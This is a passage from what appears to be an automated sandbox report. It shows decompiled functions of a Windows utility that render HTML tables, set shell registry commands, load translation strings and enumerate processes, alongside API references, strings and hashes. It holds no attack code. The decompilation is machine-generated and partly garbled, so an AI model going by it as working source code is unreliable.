					L0040B1EC();
					_t161 = _t161 + 0x18;
				}
				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t153;
				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
					while(1) {
						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
						_v12 = _t156;
						_t157 = _t156 * 0x14;
						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t153;
						_t154 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
						E0040ADC0(_v32,  &_v348);
						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
						} else {
							_push( *(_t157 + _v16 + 0x10));
							_push(E0040ADC0(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x68));
							L0040B1EC();
							_t161 = _t161 + 0x14;
						}
						_t109 =  *(_t124 + 0x64);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
						}
						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
						_push( *((intOrPtr*)(_t124 + 0x6c)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x68));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x60)));
						L0040B1EC();
						_t161 = _t161 + 0x28;
						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
							goto L14;
						}
						_t153 = 0;
					}
				}
				L14:
				E00407343(_t124, _a4, L"</table><p>");
				return E00407343(_t124, _a4, L"\r\n");
			}

0x00407763
0x0040776c
0x00407784
0x0040778b
0x00407797
0x00407799
0x0040779b
0x004077a7
0x004077ae
0x004077bd
0x004077c4
0x004077d3
0x004077da
0x004077e1
0x004077e6
0x004077f2
0x004077f5
0x00407804
0x00407805
0x00407810
0x00407812
0x00407813
0x00407818
0x00407818
0x00407825
0x0040782d
0x00407830
0x0040783a
0x00407840
0x00407846
0x00407849
0x00407850
0x0040785e
0x00407864
0x00407867
0x0040786b
0x0040786f
0x00407877
0x0040787a
0x00407885
0x00407892
0x004078a8
0x004078b8
0x004078c5
0x004078ff
0x004078c7
0x004078ca
0x004078dd
0x004078de
0x004078e3
0x004078e8
0x004078eb
0x004078f0
0x004078f0
0x00407906
0x00407909
0x0040790f
0x0040791d
0x00407923
0x0040792d
0x00407932
0x0040793b
0x00407942
0x00407943
0x0040794c
0x00407953
0x00407954
0x00407959
0x0040795c
0x00407961
0x0040796c
0x00407971
0x0040797a
0x00000000
0x00000000
0x00407838
0x00407838
0x0040783a
0x00407980
0x0040798a
0x004079a1

APIs

memset.MSVCRT ref: 00407784
memset.MSVCRT ref: 004077AE
memset.MSVCRT ref: 004077C4
memset.MSVCRT ref: 004077DA
_snwprintf.MSVCRT ref: 00407813
wcscpy.MSVCRT ref: 0040785E
_snwprintf.MSVCRT ref: 004078EB
wcscat.MSVCRT ref: 0040791D

Part of subcall function 0040ADC0: _snwprintf.MSVCRT ref: 0040ADE4

wcscpy.MSVCRT ref: 004078FF
_snwprintf.MSVCRT ref: 0040795C

Strings

<font color="%s">%s</font>, xrefs: 004078DE
<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s, xrefs: 0040778C
bgcolor="%s", xrefs: 00407805
<table border="1" cellpadding="5">, xrefs: 0040781B
nowrap, xrefs: 00407858
</table><p>, xrefs: 00407980
 , xrefs: 00407917

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfmemset$wcscpy$wcscat
String ID: bgcolor="%s"$ nowrap$ $</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
API String ID: 1607361635-601624466
Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00407B5D, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E0040B550(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040ADC0(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040B1EC();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040ADC0(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040B1EC();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040B1EC();
				_t80 = _t79 + 0x10;
				E00407343(_a4, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040B1EC();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040B1EC();
						_t80 = _t81 + 0x1c;
						_t61 = E00407343(_a4, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}

0x00407b65
0x00407b7c
0x00407b83
0x00407b91
0x00407b98
0x00407ba6
0x00407bad
0x00407bb2
0x00407bb9
0x00407bca
0x00407bcb
0x00407bd6
0x00407bdb
0x00407bdc
0x00407be1
0x00407be1
0x00407be8
0x00407bf9
0x00407bfa
0x00407c05
0x00407c0a
0x00407c0b
0x00407c1c
0x00407c21
0x00407c21
0x00407c2a
0x00407c2b
0x00407c36
0x00407c3b
0x00407c3c
0x00407c41
0x00407c51
0x00407c56
0x00407c5b
0x00407c65
0x00407c68
0x00407c6b
0x00407c74
0x00407c7b
0x00407c80
0x00407c82
0x00407c88
0x00407ca6
0x00407c8a
0x00407c8a
0x00407c8b
0x00407c96
0x00407c9b
0x00407c9c
0x00407ca1
0x00407ca1
0x00407cb3
0x00407cb4
0x00407cbd
0x00407cc4
0x00407cc5
0x00407cd0
0x00407cd5
0x00407cd6
0x00407cdb
0x00407ceb
0x00407cf0
0x00407cf3
0x00407cf3
0x00407cf3
0x00000000
0x00407cfc
0x00407d00

APIs

memset.MSVCRT ref: 00407B83
memset.MSVCRT ref: 00407B98
memset.MSVCRT ref: 00407BAD
_snwprintf.MSVCRT ref: 00407BDC
_snwprintf.MSVCRT ref: 00407C0B
wcscpy.MSVCRT ref: 00407C1C
_snwprintf.MSVCRT ref: 00407C3C
memset.MSVCRT ref: 00407C7B
_snwprintf.MSVCRT ref: 00407C9C
_snwprintf.MSVCRT ref: 00407CD6

Part of subcall function 0040ADC0: _snwprintf.MSVCRT ref: 0040ADE4

Strings

<th%s>%s%s%s, xrefs: 00407CC5
</font>, xrefs: 00407C16
bgcolor="%s", xrefs: 00407BCB
width="%s", xrefs: 00407C8B
<font color="%s">, xrefs: 00407BFA
<table border="1" cellpadding="5"><tr%s>, xrefs: 00407C2B

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf$memset$wcscpy
String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
API String ID: 2000436516-3842416460
Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404415, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 124
registryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v24;
				intOrPtr _v28;
				short _v32;
				void _v2078;
				signed int _v2080;
				void _v4126;
				char _v4128;
				void _v6174;
				char _v6176;
				void _v8222;
				char _v8224;
				signed int _t49;
				short _t55;
				intOrPtr _t56;
				int _t73;
				intOrPtr _t78;

				_t76 = __ecx;
				E0040B550(0x201c, __ecx);
				_t73 = 0;
				if(E004043F8( &_v8, 0x2001f) != 0) {
					L6:
					return _t73;
				}
				_v6176 = 0;
				memset( &_v6174, 0, 0x7fe);
				_t78 = _a4;
				_push(_t78 + 0x20a);
				_push(_t78);
				_push(L"%s\\shell\\%s\\command");
				_push(0x3ff);
				_push( &_v6176);
				L0040B1EC();
				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
					asm("sbb ebx, ebx");
					_t73 =  ~_t49 + 1;
					RegCloseKey(_v12);
					_v2080 = _v2080 & 0x00000000;
					memset( &_v2078, 0, 0x7fe);
					E00404AD9( &_v2080);
					if(_v2078 == 0x3a) {
						_t55 =  *L"C:\\"; // 0x3a0043
						_v32 = _t55;
						_t56 =  *0x40ccdc; // 0x5c
						_v28 = _t56;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v32 = _v2080;
						if(GetDriveTypeW( &_v32) == 3) {
							_v4128 = 0;
							memset( &_v4126, 0, 0x7fe);
							_v8224 = 0;
							memset( &_v8222, 0, 0x7fe);
							_push(_a4 + 0x20a);
							_push(_a4);
							_push(L"%s\\shell\\%s");
							_push(0x3ff);
							_push( &_v8224);
							L0040B1EC();
							_push( &_v2080);
							_push(L"\"%s\",0");
							_push(0x3ff);
							_push( &_v4128);
							L0040B1EC();
							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
						}
					}
				}
				RegCloseKey(_v8);
				goto L6;
			}

0x00404415
0x0040441d
0x0040442c
0x00404435
0x004045b3
0x004045b7
0x004045b7
0x0040444b
0x00404452
0x00404457
0x00404460
0x00404461
0x00404462
0x0040446d
0x00404472
0x00404473
0x00404490
0x004044a5
0x004044b4
0x004044b6
0x004044b7
0x004044bd
0x004044cf
0x004044db
0x004044eb
0x004044f1
0x004044f6
0x004044f9
0x004044fe
0x00404506
0x00404507
0x00404508
0x00404510
0x00404521
0x00404532
0x00404539
0x00404547
0x0040454e
0x0040455b
0x0040455c
0x00404564
0x0040456f
0x00404570
0x00404571
0x0040457c
0x0040457d
0x00404588
0x00404589
0x0040458a
0x004045a0
0x004045a5
0x00404521
0x004044eb
0x004045ab
0x00000000

APIs

memset.MSVCRT ref: 00404452
_snwprintf.MSVCRT ref: 00404473

Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC

RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB

Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13

RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
memset.MSVCRT ref: 004044CF

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

GetDriveTypeW.KERNEL32(?), ref: 00404518
memset.MSVCRT ref: 00404539
memset.MSVCRT ref: 0040454E
_snwprintf.MSVCRT ref: 00404571
_snwprintf.MSVCRT ref: 0040458A

Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57

Strings

%s\shell\%s\command, xrefs: 00404462
"%s",0, xrefs: 0040457D
%s\shell\%s, xrefs: 00404564
:, xrefs: 004044E3
C:\, xrefs: 004044F1

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
API String ID: 486436031-734527199
Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}

0x00406466
0x0040647d
0x00406484
0x00406499
0x004064a0
0x004064af
0x004064b4
0x004064bb
0x004064cd
0x004064d2
0x004064d4
0x004064e4
0x004064ea
0x004064ea
0x004064f3
0x00406503
0x00406514
0x00406525
0x0040653b
0x0040654e
0x00406568
0x00406572
0x0040657a
0x00406582
0x0040658a
0x00406596

APIs

memset.MSVCRT ref: 00406484
memset.MSVCRT ref: 004064A0

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128

wcscpy.MSVCRT ref: 004064E4
wcscpy.MSVCRT ref: 004064F3
wcscpy.MSVCRT ref: 00406503
EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
wcscpy.MSVCRT ref: 0040657A

Strings

TranslatorURL, xrefs: 00406520
general, xrefs: 004064F8
SFM, xrefs: 00406502
RTL, xrefs: 00406549
TranslatorName, xrefs: 0040650F
strings, xrefs: 00406574
Version, xrefs: 00406536

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
API String ID: 3037099051-2314623505
Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED

Uniqueness

Uniqueness Score: -1.00%

Function 00409A94, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 154
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00409A94(long _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				void _v315;
				char _v316;
				void _v826;
				char _v828;
				void _v1338;
				char _v1340;
				void* __esi;
				void* _t61;
				_Unknown_base(*)()* _t93;
				void* _t94;
				int _t106;
				void* _t108;
				void* _t110;

				_v828 = 0;
				memset( &_v826, 0, 0x1fe);
				_v1340 = 0;
				memset( &_v1338, 0, 0x1fe);
				_t110 = _t108 + 0x18;
				_t61 = OpenProcess(0x400, 0, _a4);
				_t113 = _t61;
				_v20 = _t61;
				if(_t61 == 0) {
					L11:
					if(_v828 == 0) {
						__eflags = 0;
						return 0;
					}
					_push( &_v828);
					_push( &_v1340);
					_push(L"%s\\%s");
					_push(0xff);
					_push(_a8);
					L0040B1EC();
					return 1;
				}
				_v8 = 0;
				_v24 = 0;
				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
				_t106 = _v24;
				if(_t106 == 0) {
					_t32 =  &_v20; // 0x4059ec
					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
					_v316 = 0;
					memset( &_v315, 0, 0xfe);
					_t110 = _t110 + 0x20;
					_v16 = 0xff;
					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
					if(__eflags == 0) {
						L9:
						CloseHandle(_v20);
						if(_v8 != 0) {
							FreeLibrary(_v8);
						}
						goto L11;
					}
					_push( &_v28);
					_push( &_a4);
					_push( &_v1340);
					_push( &_v12);
					_push( &_v828);
					_a4 = 0xff;
					_push( &_v316);
					L8:
					_v12 = 0xff;
					E0040906D( &_v8, _t117);
					goto L9;
				}
				_v316 = 0;
				memset( &_v315, 0, 0xff);
				_v12 = _t106;
				_t110 = _t110 + 0xc;
				_a4 = 0;
				if(E00408F72( &_v8) == 0) {
					goto L9;
				}
				_t93 = GetProcAddress(_v8, "GetTokenInformation");
				if(_t93 == 0) {
					goto L9;
				}
				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
				_t117 = _t94;
				if(_t94 == 0) {
					goto L9;
				}
				_push( &_v28);
				_push( &_v12);
				_push( &_v1340);
				_push( &_v16);
				_push( &_v828);
				_push(_v316);
				_v16 = 0xff;
				goto L8;
			}

0x00409ab0
0x00409ab7
0x00409ac8
0x00409acf
0x00409ad4
0x00409ae0
0x00409ae6
0x00409ae8
0x00409af0
0x00409c3a
0x00409c41
0x00409c67
0x00000000
0x00409c67
0x00409c49
0x00409c50
0x00409c51
0x00409c56
0x00409c57
0x00409c5a
0x00000000
0x00409c64
0x00409b00
0x00409b03
0x00409b06
0x00409b0b
0x00409b10
0x00409ba9
0x00409bac
0x00409bc1
0x00409bc7
0x00409bcc
0x00409bd8
0x00409bf0
0x00409bf2
0x00409c23
0x00409c26
0x00409c2f
0x00409c34
0x00409c34
0x00000000
0x00409c2f
0x00409bf7
0x00409bfb
0x00409c02
0x00409c06
0x00409c0d
0x00409c14
0x00409c17
0x00409c18
0x00409c1b
0x00409c1e
0x00000000
0x00409c1e
0x00409b1f
0x00409b25
0x00409b2a
0x00409b2d
0x00409b33
0x00409b3d
0x00000000
0x00000000
0x00409b4b
0x00409b53
0x00000000
0x00000000
0x00409b6a
0x00409b6c
0x00409b6e
0x00000000
0x00000000
0x00409b77
0x00409b7b
0x00409b82
0x00409b86
0x00409b8d
0x00409b8e
0x00409b94
0x00000000

APIs

memset.MSVCRT ref: 00409AB7
memset.MSVCRT ref: 00409ACF
OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
_snwprintf.MSVCRT ref: 00409C5A

Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8

memset.MSVCRT ref: 00409B25
GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
memset.MSVCRT ref: 00409BC7
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34

Strings

%s\%s, xrefs: 00409C51
GetTokenInformation, xrefs: 00409B43
Y@, xrefs: 00409BA9

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
String ID: %s\%s$GetTokenInformation$Y@
API String ID: 3504373036-27875219
Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409172, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409172() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t5;

				if( *0x4101bc != 0) {
					return _t1;
				}
				_t2 = E00405436(L"psapi.dll");
				_t5 = _t2;
				if(_t5 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
					 *0x40f848 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t5, "EnumProcessModules");
						 *0x40f840 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
							 *0x40f838 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t5, "EnumProcesses");
								 *0x40fa6c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t5, "GetModuleInformation");
									 *0x40f844 = _t2;
									if(_t2 != 0) {
										 *0x4101bc = 1;
									}
								}
							}
						}
					}
					if( *0x4101bc == 0) {
						_t2 = FreeLibrary(_t5);
					}
					goto L10;
				}
			}

0x00409179
0x00409209
0x00409209
0x00409185
0x0040918a
0x0040918f
0x00409208
0x00000000
0x00409191
0x0040919e
0x004091a2
0x004091a7
0x004091af
0x004091b3
0x004091b8
0x004091c0
0x004091c4
0x004091c9
0x004091d1
0x004091d5
0x004091da
0x004091e2
0x004091e6
0x004091eb
0x004091ed
0x004091ed
0x004091eb
0x004091da
0x004091c9
0x004091b8
0x004091ff
0x00409202
0x00409202
0x00000000
0x004091ff

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
FreeLibrary.KERNEL32(00000000), ref: 00409202

Strings

EnumProcesses, xrefs: 004091CB
EnumProcessModules, xrefs: 004091A9
GetModuleBaseNameW, xrefs: 00409198
GetModuleFileNameExW, xrefs: 004091BA
GetModuleInformation, xrefs: 004091DC
psapi.dll, xrefs: 00409180

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Library$Load$Freememsetwcscat
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 1182944575-70141382
Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
